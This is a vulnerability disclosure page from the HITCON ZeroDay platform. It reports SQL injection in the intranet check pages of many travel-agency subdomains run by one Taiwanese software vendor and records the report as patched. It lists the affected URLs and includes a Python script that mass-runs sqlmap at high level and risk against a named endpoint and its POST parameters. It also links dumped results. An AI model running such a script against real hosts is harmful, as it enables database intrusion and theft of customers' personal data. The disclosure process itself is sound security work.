Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2021-00094
- 發信 Vendor: 喜多方科技
- Title: 喜多方科技有限公司 多處網站存在 sql injection
- Introduction: sql injection
處理狀態
目前狀態
公開
Last Update : 2021/03/11
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2021/02/28 14:36:34 : 新提交 (由 entroy 更新此狀態)
- 2021/03/01 23:41:03 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/03/02 15:03:58 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/03/02 15:03:58 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/03/02 15:03:58 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/03/03 13:08:17 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/03/11 03:00:05 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2021-00094
- 通報者:entroy (entroy)
- 風險:高
- 類型:資料庫注入攻擊 (SQL Injection)
參考資料
攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection
漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection
漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html
防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.ittms.com.tw/intranet/check/
http://0422207088.ittms.com.tw/intranet/check/
http://24tms.ittms.com.tw/intranet/check/
http://337123.ittms.com.tw/intranet/check/
http://66666.ittms.com.tw/intranet/check/
http://99tour.ittms.com.tw/intranet/check/
http://a2894004.ittms.com.tw/intranet/check/
http://agent.ittms.com.tw/intranet/check/
http://agt.ittms.com.tw/intranet/check/
http://allhappy.ittms.com.tw/intranet/check/
http://amsito.ittms.com.tw/intranet/check/
http://bingo.ittms.com.tw/intranet/check/
http://boxintour.ittms.com.tw/intranet/check/
http://caneis.ittms.com.tw/intranet/check/
http://cctours.ittms.com.tw/intranet/check/
http://cheap.ittms.com.tw/intranet/check/
http://chenghan-travel.ittms.com.tw/intranet/check/
http://chiahao.ittms.com.tw/intranet/check/
http://chiajen.ittms.com.tw/intranet/check/
http://chiake.ittms.com.tw/intranet/check/
http://chinayes.ittms.com.tw/intranet/check/
http://chinchien.ittms.com.tw/intranet/check/
http://chingchi.ittms.com.tw/intranet/check/
http://chuntours.ittms.com.tw/intranet/check/
http://cjtravel.ittms.com.tw/intranet/check/
http://cli.ittms.com.tw/intranet/check/
http://company.ittms.com.tw/intranet/check/
http://csts.ittms.com.tw/intranet/check/
http://ct-tour.ittms.com.tw/intranet/check/
http://dawang.ittms.com.tw/intranet/check/
http://dayierdvel.ittms.com.tw/intranet/check/
http://deshuntour.ittms.com.tw/intranet/check/
http://diher.ittms.com.tw/intranet/check/
http://dingtaitour.ittms.com.tw/intranet/check/
http://dongyangtour.ittms.com.tw/intranet/check/
http://dorcas.ittms.com.tw/intranet/check/
http://dreamholiday.ittms.com.tw/intranet/check/
http://dstravel.ittms.com.tw/intranet/check/
http://easygotour.ittms.com.tw/intranet/check/
http://easytravel.ittms.com.tw/intranet/check/
http://efly.ittms.com.tw/intranet/check/
http://etc.ittms.com.tw/intranet/check/
http://ettravel.ittms.com.tw/intranet/check/
http://evtravel.ittms.com.tw/intranet/check/
http://eztkt.ittms.com.tw/intranet/check/
http://eztogo.ittms.com.tw/intranet/check/
http://ezts-rmq.ittms.com.tw/intranet/check/
http://fctnn.ittms.com.tw/intranet/check/
http://flytours.ittms.com.tw/intranet/check/
http://formosaholiday.ittms.com.tw/intranet/check/
http://foryou.ittms.com.tw/intranet/check/
http://fpgtravel.ittms.com.tw/intranet/check/
http://frwtour.ittms.com.tw/intranet/check/
http://ftstour.ittms.com.tw/intranet/check/
http://fubon-travel.ittms.com.tw/intranet/check/
http://funnyvacation.ittms.com.tw/intranet/check/
http://ga-tour.ittms.com.tw/intranet/check/
http://ge-tour.ittms.com.tw/intranet/check/
http://ghr.ittms.com.tw/intranet/check/
http://git88.ittms.com.tw/intranet/check/
http://go123.ittms.com.tw/intranet/check/
http://golden.ittms.com.tw/intranet/check/
http://goldenspeed.ittms.com.tw/intranet/check/
http://gooddaytour.ittms.com.tw/intranet/check/
http://gorgeousholiday.ittms.com.tw/intranet/check/
http://gvtour.ittms.com.tw/intranet/check/
http://gvtour-bbc.ittms.com.tw/intranet/check/
http://haixia168.ittms.com.tw/intranet/check/
http://happygotour.ittms.com.tw/intranet/check/
http://happyspring.ittms.com.tw/intranet/check/
http://hctravel.ittms.com.tw/intranet/check/
http://hecheng.ittms.com.tw/intranet/check/
http://hhts.ittms.com.tw/intranet/check/
http://highfuntour.ittms.com.tw/intranet/check/
http://homeitour.ittms.com.tw/intranet/check/
http://honeygolf.ittms.com.tw/intranet/check/
http://hsihung.ittms.com.tw/intranet/check/
http://hstour.ittms.com.tw/intranet/check/
http://hsuanyi168.ittms.com.tw/intranet/check/
http://httravel.ittms.com.tw/intranet/check/
http://i-fly.ittms.com.tw/intranet/check/
http://igogotour.ittms.com.tw/intranet/check/
http://ijoytour.ittms.com.tw/intranet/check/
http://ilan-travel.ittms.com.tw/intranet/check/
http://indiantravel.ittms.com.tw/intranet/check/
http://iplaytrip.ittms.com.tw/intranet/check/
http://itourtw.ittms.com.tw/intranet/check/
http://ittms-2014v2.ittms.com.tw/intranet/check/
http://ittms-cn-2017v3.ittms.com.tw/intranet/check/
http://jason01.ittms.com.tw/intranet/check/
http://jimmytour.ittms.com.tw/intranet/check/
http://jiufengtour.ittms.com.tw/intranet/check/
http://joeyotour.ittms.com.tw/intranet/check/
http://join-tour.ittms.com.tw/intranet/check/
http://jollytour.ittms.com.tw/intranet/check/
http://jtravel.ittms.com.tw/intranet/check/
http://kaihsing.ittms.com.tw/intranet/check/
http://kaita.ittms.com.tw/intranet/check/
http://kamalan.ittms.com.tw/intranet/check/
http://kingtrip.ittms.com.tw/intranet/check/
http://laneyangtour.ittms.com.tw/intranet/check/
http://le-chun.ittms.com.tw/intranet/check/
http://leadership.ittms.com.tw/intranet/check/
http://leonpkg.ittms.com.tw/intranet/check/
http://linkasia.ittms.com.tw/intranet/check/
http://linlintour.ittms.com.tw/intranet/check/
http://lk1992.ittms.com.tw/intranet/check/
http://logotour.ittms.com.tw/intranet/check/
http://lohas-new.ittms.com.tw/intranet/check/
http://loyodo.ittms.com.tw/intranet/check/
http://marcopolo.ittms.com.tw/intranet/check/
http://martin.ittms.com.tw/intranet/check/
http://matsu.ittms.com.tw/intranet/check/
http://miaoli.ittms.com.tw/intranet/check/
http://mtour.ittms.com.tw/intranet/check/
http://newlines.ittms.com.tw/intranet/check/
http://nicetour.ittms.com.tw/intranet/check/
http://nienhwatravel.ittms.com.tw/intranet/check/
http://northwest.ittms.com.tw/intranet/check/
http://nt-tour168.ittms.com.tw/intranet/check/
http://oceantour.ittms.com.tw/intranet/check/
http://orient-2.ittms.com.tw/intranet/check/
http://partnertour.ittms.com.tw/intranet/check/
http://pc.ittms.com.tw/intranet/check/
http://penghu.ittms.com.tw/intranet/check/
http://perfect.ittms.com.tw/intranet/check/
http://ptrtour.ittms.com.tw/intranet/check/
http://puretravel-2.ittms.com.tw/intranet/check/
http://qyts.ittms.com.tw/intranet/check/
http://rainbowtravel.ittms.com.tw/intranet/check/
http://readytour.ittms.com.tw/intranet/check/
http://relaxtour.ittms.com.tw/intranet/check/
http://rih-sin.ittms.com.tw/intranet/check/
http://royal-china.ittms.com.tw/intranet/check/
http://safetyback.ittms.com.tw/intranet/check/
http://scytour.ittms.com.tw/intranet/check/
http://sdutours.ittms.com.tw/intranet/check/
http://seeyou.ittms.com.tw/intranet/check/
http://shangyu.ittms.com.tw/intranet/check/
http://shengyen.ittms.com.tw/intranet/check/
http://shenhua.ittms.com.tw/intranet/check/
http://smktour.ittms.com.tw/intranet/check/
http://smktour-free.ittms.com.tw/intranet/check/
http://standard.ittms.com.tw/intranet/check/
http://standard-hotel.ittms.com.tw/intranet/check/
http://sunnyholiday.ittms.com.tw/intranet/check/
http://suntour.ittms.com.tw/intranet/check/
http://taiantour.ittms.com.tw/intranet/check/
http://tayu.ittms.com.tw/intranet/check/
http://todaytour.ittms.com.tw/intranet/check/
http://tonytour.ittms.com.tw/intranet/check/
http://toptour1.ittms.com.tw/intranet/check/
http://tour365.ittms.com.tw/intranet/check/
http://travelbirds.ittms.com.tw/intranet/check/
http://travelsmooth.ittms.com.tw/intranet/check/
http://traveltogether.ittms.com.tw/intranet/check/
http://tritour.ittms.com.tw/intranet/check/
http://tunhuang.ittms.com.tw/intranet/check/
http://tyty.ittms.com.tw/intranet/check/
http://ubustravel.ittms.com.tw/intranet/check/
http://uniquetour.ittms.com.tw/intranet/check/
http://utour.ittms.com.tw/intranet/check/
http://vivid.ittms.com.tw/intranet/check/
http://wangpiin.ittms.com.tw/intranet/check/
http://wanle.ittms.com.tw/intranet/check/
http://welcometour.ittms.com.tw/intranet/check/
http://wellingtour.ittms.com.tw/intranet/check/
http://wintour.ittms.com.tw/intranet/check/
http://wondertour.ittms.com.tw/intranet/check/
http://xinxin.ittms.com.tw/intranet/check/
http://yingchang.ittms.com.tw/intranet/check/
http://yufen888.ittms.com.tw/intranet/check/
http://yumingtour.ittms.com.tw/intranet/check/
http://yunhaitour.ittms.com.tw/intranet/check/
http://0422207088.ittms.com.tw/intranet/check/
http://24tms.ittms.com.tw/intranet/check/
http://337123.ittms.com.tw/intranet/check/
http://66666.ittms.com.tw/intranet/check/
http://99tour.ittms.com.tw/intranet/check/
http://a2894004.ittms.com.tw/intranet/check/
http://agent.ittms.com.tw/intranet/check/
http://agt.ittms.com.tw/intranet/check/
http://allhappy.ittms.com.tw/intranet/check/
http://amsito.ittms.com.tw/intranet/check/
http://bingo.ittms.com.tw/intranet/check/
http://boxintour.ittms.com.tw/intranet/check/
http://caneis.ittms.com.tw/intranet/check/
http://cctours.ittms.com.tw/intranet/check/
http://cheap.ittms.com.tw/intranet/check/
http://chenghan-travel.ittms.com.tw/intranet/check/
http://chiahao.ittms.com.tw/intranet/check/
http://chiajen.ittms.com.tw/intranet/check/
http://chiake.ittms.com.tw/intranet/check/
http://chinayes.ittms.com.tw/intranet/check/
http://chinchien.ittms.com.tw/intranet/check/
http://chingchi.ittms.com.tw/intranet/check/
http://chuntours.ittms.com.tw/intranet/check/
http://cjtravel.ittms.com.tw/intranet/check/
http://cli.ittms.com.tw/intranet/check/
http://company.ittms.com.tw/intranet/check/
http://csts.ittms.com.tw/intranet/check/
http://ct-tour.ittms.com.tw/intranet/check/
http://dawang.ittms.com.tw/intranet/check/
http://dayierdvel.ittms.com.tw/intranet/check/
http://deshuntour.ittms.com.tw/intranet/check/
http://diher.ittms.com.tw/intranet/check/
http://dingtaitour.ittms.com.tw/intranet/check/
http://dongyangtour.ittms.com.tw/intranet/check/
http://dorcas.ittms.com.tw/intranet/check/
http://dreamholiday.ittms.com.tw/intranet/check/
http://dstravel.ittms.com.tw/intranet/check/
http://easygotour.ittms.com.tw/intranet/check/
http://easytravel.ittms.com.tw/intranet/check/
http://efly.ittms.com.tw/intranet/check/
http://etc.ittms.com.tw/intranet/check/
http://ettravel.ittms.com.tw/intranet/check/
http://evtravel.ittms.com.tw/intranet/check/
http://eztkt.ittms.com.tw/intranet/check/
http://eztogo.ittms.com.tw/intranet/check/
http://ezts-rmq.ittms.com.tw/intranet/check/
http://fctnn.ittms.com.tw/intranet/check/
http://flytours.ittms.com.tw/intranet/check/
http://formosaholiday.ittms.com.tw/intranet/check/
http://foryou.ittms.com.tw/intranet/check/
http://fpgtravel.ittms.com.tw/intranet/check/
http://frwtour.ittms.com.tw/intranet/check/
http://ftstour.ittms.com.tw/intranet/check/
http://fubon-travel.ittms.com.tw/intranet/check/
http://funnyvacation.ittms.com.tw/intranet/check/
http://ga-tour.ittms.com.tw/intranet/check/
http://ge-tour.ittms.com.tw/intranet/check/
http://ghr.ittms.com.tw/intranet/check/
http://git88.ittms.com.tw/intranet/check/
http://go123.ittms.com.tw/intranet/check/
http://golden.ittms.com.tw/intranet/check/
http://goldenspeed.ittms.com.tw/intranet/check/
http://gooddaytour.ittms.com.tw/intranet/check/
http://gorgeousholiday.ittms.com.tw/intranet/check/
http://gvtour.ittms.com.tw/intranet/check/
http://gvtour-bbc.ittms.com.tw/intranet/check/
http://haixia168.ittms.com.tw/intranet/check/
http://happygotour.ittms.com.tw/intranet/check/
http://happyspring.ittms.com.tw/intranet/check/
http://hctravel.ittms.com.tw/intranet/check/
http://hecheng.ittms.com.tw/intranet/check/
http://hhts.ittms.com.tw/intranet/check/
http://highfuntour.ittms.com.tw/intranet/check/
http://homeitour.ittms.com.tw/intranet/check/
http://honeygolf.ittms.com.tw/intranet/check/
http://hsihung.ittms.com.tw/intranet/check/
http://hstour.ittms.com.tw/intranet/check/
http://hsuanyi168.ittms.com.tw/intranet/check/
http://httravel.ittms.com.tw/intranet/check/
http://i-fly.ittms.com.tw/intranet/check/
http://igogotour.ittms.com.tw/intranet/check/
http://ijoytour.ittms.com.tw/intranet/check/
http://ilan-travel.ittms.com.tw/intranet/check/
http://indiantravel.ittms.com.tw/intranet/check/
http://iplaytrip.ittms.com.tw/intranet/check/
http://itourtw.ittms.com.tw/intranet/check/
http://ittms-2014v2.ittms.com.tw/intranet/check/
http://ittms-cn-2017v3.ittms.com.tw/intranet/check/
http://jason01.ittms.com.tw/intranet/check/
http://jimmytour.ittms.com.tw/intranet/check/
http://jiufengtour.ittms.com.tw/intranet/check/
http://joeyotour.ittms.com.tw/intranet/check/
http://join-tour.ittms.com.tw/intranet/check/
http://jollytour.ittms.com.tw/intranet/check/
http://jtravel.ittms.com.tw/intranet/check/
http://kaihsing.ittms.com.tw/intranet/check/
http://kaita.ittms.com.tw/intranet/check/
http://kamalan.ittms.com.tw/intranet/check/
http://kingtrip.ittms.com.tw/intranet/check/
http://laneyangtour.ittms.com.tw/intranet/check/
http://le-chun.ittms.com.tw/intranet/check/
http://leadership.ittms.com.tw/intranet/check/
http://leonpkg.ittms.com.tw/intranet/check/
http://linkasia.ittms.com.tw/intranet/check/
http://linlintour.ittms.com.tw/intranet/check/
http://lk1992.ittms.com.tw/intranet/check/
http://logotour.ittms.com.tw/intranet/check/
http://lohas-new.ittms.com.tw/intranet/check/
http://loyodo.ittms.com.tw/intranet/check/
http://marcopolo.ittms.com.tw/intranet/check/
http://martin.ittms.com.tw/intranet/check/
http://matsu.ittms.com.tw/intranet/check/
http://miaoli.ittms.com.tw/intranet/check/
http://mtour.ittms.com.tw/intranet/check/
http://newlines.ittms.com.tw/intranet/check/
http://nicetour.ittms.com.tw/intranet/check/
http://nienhwatravel.ittms.com.tw/intranet/check/
http://northwest.ittms.com.tw/intranet/check/
http://nt-tour168.ittms.com.tw/intranet/check/
http://oceantour.ittms.com.tw/intranet/check/
http://orient-2.ittms.com.tw/intranet/check/
http://partnertour.ittms.com.tw/intranet/check/
http://pc.ittms.com.tw/intranet/check/
http://penghu.ittms.com.tw/intranet/check/
http://perfect.ittms.com.tw/intranet/check/
http://ptrtour.ittms.com.tw/intranet/check/
http://puretravel-2.ittms.com.tw/intranet/check/
http://qyts.ittms.com.tw/intranet/check/
http://rainbowtravel.ittms.com.tw/intranet/check/
http://readytour.ittms.com.tw/intranet/check/
http://relaxtour.ittms.com.tw/intranet/check/
http://rih-sin.ittms.com.tw/intranet/check/
http://royal-china.ittms.com.tw/intranet/check/
http://safetyback.ittms.com.tw/intranet/check/
http://scytour.ittms.com.tw/intranet/check/
http://sdutours.ittms.com.tw/intranet/check/
http://seeyou.ittms.com.tw/intranet/check/
http://shangyu.ittms.com.tw/intranet/check/
http://shengyen.ittms.com.tw/intranet/check/
http://shenhua.ittms.com.tw/intranet/check/
http://smktour.ittms.com.tw/intranet/check/
http://smktour-free.ittms.com.tw/intranet/check/
http://standard.ittms.com.tw/intranet/check/
http://standard-hotel.ittms.com.tw/intranet/check/
http://sunnyholiday.ittms.com.tw/intranet/check/
http://suntour.ittms.com.tw/intranet/check/
http://taiantour.ittms.com.tw/intranet/check/
http://tayu.ittms.com.tw/intranet/check/
http://todaytour.ittms.com.tw/intranet/check/
http://tonytour.ittms.com.tw/intranet/check/
http://toptour1.ittms.com.tw/intranet/check/
http://tour365.ittms.com.tw/intranet/check/
http://travelbirds.ittms.com.tw/intranet/check/
http://travelsmooth.ittms.com.tw/intranet/check/
http://traveltogether.ittms.com.tw/intranet/check/
http://tritour.ittms.com.tw/intranet/check/
http://tunhuang.ittms.com.tw/intranet/check/
http://tyty.ittms.com.tw/intranet/check/
http://ubustravel.ittms.com.tw/intranet/check/
http://uniquetour.ittms.com.tw/intranet/check/
http://utour.ittms.com.tw/intranet/check/
http://vivid.ittms.com.tw/intranet/check/
http://wangpiin.ittms.com.tw/intranet/check/
http://wanle.ittms.com.tw/intranet/check/
http://welcometour.ittms.com.tw/intranet/check/
http://wellingtour.ittms.com.tw/intranet/check/
http://wintour.ittms.com.tw/intranet/check/
http://wondertour.ittms.com.tw/intranet/check/
http://xinxin.ittms.com.tw/intranet/check/
http://yingchang.ittms.com.tw/intranet/check/
http://yufen888.ittms.com.tw/intranet/check/
http://yumingtour.ittms.com.tw/intranet/check/
http://yunhaitour.ittms.com.tw/intranet/check/
敘述
我把 sqlmap 攻擊的結果通通放在 google drive 上面
python script :
import requests
import os
url_list = ['www.ittms.com.tw', '0422207088.ittms.com.tw', '24tms.ittms.com.tw', '337123.ittms.com.tw', '66666.ittms.com.tw', '99tour.ittms.com.tw', 'a2894004.ittms.com.tw', 'agent.ittms.com.tw', 'agt.ittms.com.tw', 'allhappy.ittms.com.tw', 'amsito.ittms.com.tw', 'bblink.ittms.com.tw', 'bingo.ittms.com.tw', 'blog.ittms.com.tw', 'boxintour.ittms.com.tw', 'c000140.ittms.com.tw', 'caneis.ittms.com.tw', 'cctours.ittms.com.tw', 'chapiter.ittms.com.tw', 'cheap.ittms.com.tw', 'chenghan-travel.ittms.com.tw', 'chiahao.ittms.com.tw', 'chiajen.ittms.com.tw', 'chiake.ittms.com.tw', 'chinasky.ittms.com.tw', 'chinayes.ittms.com.tw', 'chinchien.ittms.com.tw', 'chingchi.ittms.com.tw', 'chuntours.ittms.com.tw', 'cjtravel.ittms.com.tw', 'cli.ittms.com.tw', 'company.ittms.com.tw', 'crb.ittms.com.tw', 'csts.ittms.com.tw', 'ct-tour.ittms.com.tw', 'dawang.ittms.com.tw', 'dayierdvel.ittms.com.tw', 'deshuntour.ittms.com.tw', 'diher.ittms.com.tw', 'dingtaitour.ittms.com.tw', 'discovery-v2.ittms.com.tw', 'dns1.ittms.com.tw', 'dns2.ittms.com.tw', 'dongyangtour.ittms.com.tw', 'dorcas.ittms.com.tw', 'dreamholiday.ittms.com.tw', 'dstravel.ittms.com.tw', 'easygotour.ittms.com.tw', 'easytravel.ittms.com.tw', 'ecogoto.ittms.com.tw', 'edcard.ittms.com.tw', 'efly.ittms.com.tw', 'etc.ittms.com.tw', 'ettravel.ittms.com.tw', 'evpn.ittms.com.tw', 'evtravel.ittms.com.tw', 'eztkt.ittms.com.tw', 'eztogo.ittms.com.tw', 'ezts-rmq.ittms.com.tw', 'fctnn.ittms.com.tw', 'flowerhappytour.ittms.com.tw', 'flyhorse.ittms.com.tw', 'flytours.ittms.com.tw', 'formosaholiday.ittms.com.tw', 'foryou.ittms.com.tw', 'fpgtravel.ittms.com.tw', 'frwtour.ittms.com.tw', 'ftstour.ittms.com.tw', 'fubon-travel.ittms.com.tw', 'funnyvacation.ittms.com.tw', 'ga-tour.ittms.com.tw', 'ge-tour.ittms.com.tw', 'ghr.ittms.com.tw', 'git88.ittms.com.tw', 'gmtours.ittms.com.tw', 'go123.ittms.com.tw', 'golden.ittms.com.tw', 'goldenspeed.ittms.com.tw', 'gooddaytour.ittms.com.tw', 'gorgeousholiday.ittms.com.tw', 'great.ittms.com.tw', 'gvtour.ittms.com.tw', 'gvtour-bbc.ittms.com.tw', 'haixia168.ittms.com.tw', 'happygotour.ittms.com.tw', 'happyspring.ittms.com.tw', 'hc-bee2.ittms.com.tw', 'hctravel.ittms.com.tw', 'hecheng.ittms.com.tw', 'hhts.ittms.com.tw', 'highfuntour.ittms.com.tw', 'hola.ittms.com.tw', 'homeitour.ittms.com.tw', 'honeygolf.ittms.com.tw', 'hsihung.ittms.com.tw', 'hsihung-jp.ittms.com.tw', 'hsihungintranet.ittms.com.tw', 'hstour.ittms.com.tw', 'hsuanyi168.ittms.com.tw', 'httravel.ittms.com.tw', 'i-fly.ittms.com.tw', 'igogotour.ittms.com.tw', 'ihola.ittms.com.tw', 'ijoytour.ittms.com.tw', 'ilan-travel.ittms.com.tw', 'indiantravel.ittms.com.tw', 'intranet.ittms.com.tw', 'ip.ittms.com.tw', 'iplaytrip.ittms.com.tw', 'itourtw.ittms.com.tw', 'ittms-16.ittms.com.tw', 'ittms-2014v2.ittms.com.tw', 'ittms-4.ittms.com.tw', 'ittms-cn-2017v3.ittms.com.tw', 'jason01.ittms.com.tw', 'jimmytour.ittms.com.tw', 'jiufengtour.ittms.com.tw', 'joeyotour.ittms.com.tw', 'join-tour.ittms.com.tw', 'jollytour.ittms.com.tw', 'joymachitour.ittms.com.tw', 'jtravel.ittms.com.tw', 'kaihsing.ittms.com.tw', 'kaita.ittms.com.tw', 'kamalan.ittms.com.tw', 'kingtrip.ittms.com.tw', 'kitaya-new.ittms.com.tw', 'laneyangtour.ittms.com.tw', 'le-chun.ittms.com.tw', 'leadership.ittms.com.tw', 'leonpkg.ittms.com.tw', 'life-travel.ittms.com.tw', 'linkasia.ittms.com.tw', 'linlintour.ittms.com.tw', 'lk1992.ittms.com.tw', 'logotour.ittms.com.tw', 'lohas-new.ittms.com.tw', 'loyodo.ittms.com.tw', 'marcopolo.ittms.com.tw', 'martin.ittms.com.tw', 'matsu.ittms.com.tw', 'miaoli.ittms.com.tw', 'msttour.ittms.com.tw', 'msttour-new.ittms.com.tw', 'msttour2.ittms.com.tw', 'mtour.ittms.com.tw', 'mytour.ittms.com.tw', 'newlines.ittms.com.tw', 'nicetour.ittms.com.tw', 'nienhwatravel.ittms.com.tw', 'northwest.ittms.com.tw', 'nt-tour168.ittms.com.tw', 'oceantour.ittms.com.tw', 'orient.ittms.com.tw', 'orient-2.ittms.com.tw', 'orientbus.ittms.com.tw', 'orientguide.ittms.com.tw', 'partnertour.ittms.com.tw', 'pay.ittms.com.tw', 'pc.ittms.com.tw', 'pdf.ittms.com.tw', 'penghu.ittms.com.tw', 'perfect.ittms.com.tw', 'ptrtour.ittms.com.tw', 'puretravel-2.ittms.com.tw', 'qyts.ittms.com.tw', 'rainbowtravel.ittms.com.tw', 'readytour.ittms.com.tw', 'relaxtour.ittms.com.tw', 'rih-sin.ittms.com.tw', 'royal-china.ittms.com.tw', 'safetyback.ittms.com.tw', 'scytour.ittms.com.tw', 'sdutours.ittms.com.tw', 'seeyou.ittms.com.tw', 'shangyu.ittms.com.tw', 'shengyen.ittms.com.tw', 'shenhua.ittms.com.tw', 'smktour.ittms.com.tw', 'smktour-free.ittms.com.tw', 'standard.ittms.com.tw', 'standard-hotel.ittms.com.tw', 'sunnyholiday.ittms.com.tw', 'suntour.ittms.com.tw', 'taiantour.ittms.com.tw', 'tayu.ittms.com.tw', 'todaytour.ittms.com.tw', 'tonytour.ittms.com.tw', 'toptour1.ittms.com.tw', 'tour365.ittms.com.tw', 'travelbirds.ittms.com.tw', 'travelsmooth.ittms.com.tw', 'traveltogether.ittms.com.tw', 'tritour.ittms.com.tw', 'tunhuang.ittms.com.tw', 'tyty.ittms.com.tw', 'ubustravel.ittms.com.tw', 'uniquetour.ittms.com.tw', 'utour.ittms.com.tw', 'vivid.ittms.com.tw', 'wangpiin.ittms.com.tw', 'wanle.ittms.com.tw', 'webmail.ittms.com.tw', 'welcometour.ittms.com.tw', 'wellingtour.ittms.com.tw', 'wintour.ittms.com.tw', 'wondertour.ittms.com.tw', 'xinxin.ittms.com.tw', 'yapto.ittms.com.tw', 'yes369.ittms.com.tw', 'yingchang.ittms.com.tw', 'yufen888.ittms.com.tw', 'yumingtour.ittms.com.tw', 'yunhaitour.ittms.com.tw']
for url in url_list:
try:
if requests.get('http://' + url + '/intranet/check/').status_code == 200:
os.system('sqlmap http://{}/intranet/check/bank_update.asp --data="bank_id=123&bank_name=123&subject=123&B1=" --identify-waf --random-agent --skip="B1" --level 5 --risk 3 --batch --fresh-queries --dbms="Microsoft SQL Server"'.format(url))
else:
continue
except:
continue結果 : https://drive.google.com/file/d/1BU1FfW6DXx1eFfxJ2ctu9SziMeobkJtJ/view?usp=sharing
擷圖
留言討論
登入後留言
聯絡組織
發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。